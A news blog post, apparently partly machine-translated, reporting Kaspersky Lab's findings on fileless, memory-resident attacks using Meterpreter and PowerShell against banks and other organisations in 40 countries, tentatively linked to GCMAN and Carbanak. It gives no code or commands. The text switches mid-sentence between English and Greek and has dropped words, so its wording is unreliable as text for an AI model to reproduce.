GCMAN and Carbanak Hacking in 40 countries with hidden malware

Banks, telecommunication companies and government agencies in the US, South America, Europe and Africa are among the top targets, with the notorious GCMAN and Carbanak groups among the key suspects.

Οι ειδικοί της Kaspersky Lab ανακάλυψαν μια σειρά από «αόρατες» στοχευμένες επιθέσεις που χρησιμοποιούν μόνο νόμιμο λογισμικό: ευρέως διαθέσιμα εργαλεία για και εργαλεία διαχείρισης, καθώς και το πλαίσιο συνεργασίας PowerShell για την αυτοματοποίηση εργασιών στα - with no malware files on the hard disk, but hidden in memory. This combined approach helps avoid detection by whitelisting technologies and leaves researchers with almost no objects or samples of malware they could work with.GCMAN and Carbanak.

Attackers remain in the system for a long time to gather information before their tracks disappear from it after the first restart.

At the end of 2016, banks contacted Kaspersky Lab specialists in CIS, who identified the Meterpreter (penetration testing software currently commonly used for malicious purposes) in the memory of their servers at times that were supposed to not it is there. Kaspersky Lab has discovered that the Meterpreter code has been combined with a series of legitimate PowerShell scenarios and other utilities. The combined tools were adapted to malicious code that could be hidden in memory by invisibly collecting system administrator passwords so that attackers would be able to remotely control the victim's systems. The ultimate goal seems to be access to economic processes.

Η Kaspersky Lab έκτοτε αποκάλυψε ότι οι επιθέσεις αυτές συμβαίνουν σε μαζική κλίμακα: πλήγματα σε πάνω από 140 δίκτυα επιχειρήσεων σε διάφορους επιχειρηματικούς τομείς, με τα περισσότερα θύματα να βρίσκονται στις ΗΠΑ, τη Γαλλία, τον Ισημερινό, την Κένυα, το Ηνωμένο Βασίλειο και τη .

The geography of organizations that were attacked by the method discovered

In total, "infections" have been recorded in 40 countries.

It is not yet known who is behind the attacks. The use of open source exploits, common Windows utilities, and unknown regions make it nearly impossible to determine που ήταν υπεύθυνη – ή ακόμα και αν πρόκειται για μια ενιαία ή περισσότερες ομάδες που μοιράζονται τα ίδια εργαλεία. Γνωστές ομάδες που έχουν τις περισσότερες παρόμοιες προσεγγίσεις είναι οι GCMAN and Carbanak.

Such tools also make it more difficult to uncover the details of the attack. The usual procedure followed when dealing with incidents is for an investigator to follow the traces and samples left on the network by the attackers. And while the on the hard disk can remain available for a year after the fact, objects hidden in memory will be deleted when the computer is first restarted. Fortunately, in this case, the experts got to them in time.

"The determination of attackers to hide their activity and make detection and response increasingly difficult explains the latest trend of anti-crime techniques and malware that rely on device memory. This is why forensic research on memory becomes critical to it κακόβουλου λογισμικού και των λειτουργιών του. Σε αυτά τα συγκεκριμένα περιστατικά, οι επιτιθέμενοι χρησιμοποίησαν κάθε δυνατή αντι- εγκληματολογική τεχνική, αποδεικνύοντας πως δεν υπάρχουν αρχεία κακόβουλου λογισμικού που απαιτούνται για την επιτυχημένη  εκδιήθηση των δεδομένων από ένα δίκτυο, και πώς η χρήση νόμιμων και ανοικτού κώδικα βοηθητικών προγραμμάτων καθιστά την απόδοση σχεδόν αδύνατη», said Sergey Golovanov, Principal Security Researcher at Kaspersky Lab.

Attackers are still active, so it is important to note that detecting such an attack is only possible in RAM, the network and the registry - and that, in such cases, the use of Yara rules based on scanning malicious files is not have no use.

Details about the second part of it s, which shows how attackers apply unique tactics to withdraw money through ATMs will be presented by Sergey Golovanov and Igor Soumenkov at the Security Analyst Summit, which will take place from April 2 to 6, 2017.

Kaspersky Lab products detect using the above tactics, techniques and procedures. More information about this story and the Yara rules for forensic analysis can be found on the dedicated blog on the site Securelist.com. Technical details, including Compromise Indicators, are also provided to customers of Kaspersky Intelligence Services.

iGuRu.gr The Best Technology Site in Greecefgns

Subscribe to Blog by Email

Subscribe to this blog and receive notifications of new posts by email.

Written by Dimitris

Dimitris hates on Mondays .....

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).